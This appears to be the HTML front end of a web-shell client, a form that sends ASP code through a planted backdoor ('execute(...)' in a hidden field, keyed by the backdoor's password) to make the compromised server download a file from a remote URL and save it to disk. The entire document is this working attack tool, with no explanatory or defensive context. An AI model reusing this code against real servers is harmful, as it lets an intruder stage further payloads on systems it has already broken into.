<link rel="stylesheet" type="text/css" href="lake2.css">
<div align="center">Upload File From URL </div>
<form method="post" name="xform" target="_blank">
  <p>File from URL:
  <input name="xURL" type="text" id="xURL" value="http://www.0x54.org/lake2/program/Webadmin2XCh.rar" size="70">
  <br>
  SavePath:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
  <input name="path" type="text" value="f:\webadmin.rar" size="40">
  <input type="hidden" name="code" value='execute("response.clear:thePath=request(""path""):Set xPost=CreateObject(""Microsoft.XMLHTTP""):xPost.Open ""GET"",request(""xurl""),0:xPost.Send():Set sGet=CreateObject(""ADODB.Stream""):sGet.Mode=3:sGet.Type=1:sGet.Open():sGet.Write(xPost.responseBody):sGet.SaveToFile thePath,2:set sGet=nothing:set sPOST=nothing:response.write(""Save to <b>""&thePath&""</b> Success !""):response.end")'> 
  </p>
</form>
<script>
function RUNonclick(){
document.xform.code.name = parent.pwd.value;
document.xform.action = parent.url.value;
document.xform.submit();
}
</script>